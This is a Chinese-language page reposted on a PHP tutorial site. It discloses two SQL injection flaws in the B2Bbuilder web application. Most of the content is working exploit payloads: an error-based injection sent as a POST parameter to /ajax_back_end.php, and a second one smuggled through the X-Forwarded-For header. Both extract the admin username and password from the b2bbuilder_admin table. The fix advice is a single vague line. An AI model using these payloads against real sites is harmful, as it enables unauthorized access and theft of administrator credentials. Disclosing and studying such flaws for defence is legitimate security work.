网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

B2Bbuilder最新版注入漏洞两枚 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] B2Bbuilder虽然安全性低,但是也不能放弃治疗啊~详细说明:由响应中心来通报应该好一点,直接给出EXP吧0x1 ajax_back_end phpPOST:catid=1 and (select 1 from (select count(*),concat((Select conca...

B2Bbuilder虽然安全性低,但是也不能放弃治疗啊~

详细说明:

由响应中心来通报应该好一点,直接给出EXP吧

0x1 /ajax_back_end.php

POST:catid=1 and (select 1 from (select count(*),concat((Select concat(user,0x3a,password) from b2bbuilder_admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

QQ截图20140726155437.jpg

漏洞证明:

0x2 http头注入 X-Forwarded-For

X-Forwarded-For: 1.1.1.1',(select 1 from (select count(*),concat((Select concat(user,0x3a,password) from b2bbuilder_admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a),1,1)#

QQ截图20140726155944.jpg



然后直接访问index.php,爆密码

QQ截图20140726155957.jpg

修复方案:

注入的常规修复呗

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论